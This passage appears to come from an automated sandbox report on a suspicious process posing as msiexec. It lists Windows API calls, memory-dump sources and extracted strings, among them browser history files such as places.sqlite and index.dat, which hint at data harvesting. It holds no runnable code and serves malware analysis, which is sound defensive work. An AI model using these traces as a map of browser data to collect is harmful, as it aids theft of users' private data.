                                                                                          • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                          • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                          • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                        • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                          • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                          • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                          • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                        • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                        • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                          • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                          • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                          • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                        • String ID:
                                                                                        • API String ID: 1979745280-0
                                                                                        APIs
                                                                                          • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                        • memset.MSVCRT ref: 00414C87
                                                                                        • wcscpy.MSVCRT ref: 00414CFC
                                                                                          • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProcVersionmemsetwcscpy
                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                        • API String ID: 4182280571-2036018995
                                                                                        APIs
                                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                        • memset.MSVCRT ref: 00403A55
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                        • String ID: history.dat$places.sqlite
                                                                                        • API String ID: 2641622041-467022611
                                                                                        APIs
                                                                                          • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                        • GetLastError.KERNEL32 ref: 00417627
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$File$PointerRead
                                                                                        • String ID:
                                                                                        • API String ID: 839530781-0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID: *.*$index.dat
                                                                                        • API String ID: 1974802433-2863569691
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                        • GetLastError.KERNEL32 ref: 004175A2
                                                                                        • GetLastError.KERNEL32 ref: 004175A8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 1156039329-0
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                        • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                        • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                        • String ID:
                                                                                        • API String ID: 3397143404-0
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                        • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Temp$DirectoryFileNamePathWindows
                                                                                        • String ID:
                                                                                        • API String ID: 1125800050-0
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                        • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleSleep
                                                                                        • String ID: }A
                                                                                        • API String ID: 252777609-2138825249
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d
                                                                                        • API String ID: 0-2564639436
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: BINARY
                                                                                        • API String ID: 2221118986-907554435
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp
                                                                                        • String ID: /stext
                                                                                        • API String ID: 2081463915-3817206916
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp
                                                                                        • String ID: .#v
                                                                                        • API String ID: 2081463915-507759092
                                                                                        APIs
                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                        • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                        • String ID:
                                                                                        • API String ID: 2445788494-0
                                                                                        APIs
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                        • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 3150196962-0
                                                                                        APIs
                                                                                        Strings
                                                                                        • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: malloc
                                                                                        • String ID: failed to allocate %u bytes of memory
                                                                                        • API String ID: 2803490479-1168259600
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0041BDDF
                                                                                        • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmpmemset
                                                                                        • String ID:
                                                                                        • API String ID: 1065087418-0
                                                                                        APIs
                                                                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                        • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                          • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                          • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                          • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                          • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1381354015-0
                                                                                        APIs
                                                                                          • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                          • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                          • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                          • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                        • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                        • String ID:
                                                                                        • API String ID: 2154303073-0
                                                                                        APIs
                                                                                          • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 3150196962-0
                                                                                        APIs
                                                                                        • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$PointerRead
                                                                                        • String ID:
                                                                                        • API String ID: 3154509469-0
                                                                                        APIs
                                                                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                          • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                          • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                          • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                        • String ID:
                                                                                        • API String ID: 4232544981-0
                                                                                        APIs
                                                                                        • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        APIs
                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                        • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$FileModuleName
                                                                                        • String ID:
                                                                                        • API String ID: 3859505661-0
                                                                                        APIs
                                                                                        • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        APIs
                                                                                        • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        APIs
                                                                                        • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        APIs
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??3@
                                                                                        • String ID:
                                                                                        • API String ID: 613200358-0
                                                                                        APIs
                                                                                        • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        APIs
                                                                                        • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumNamesResource
                                                                                        • String ID:
                                                                                        • API String ID: 3334572018-0
                                                                                        APIs
                                                                                        • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        APIs
                                                                                        • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFind
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004095FC
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                          • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                          • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                          • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                        Similarity
                                                                                        • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00445426
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                          • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                        Similarity
                                                                                        • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                        APIs
                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
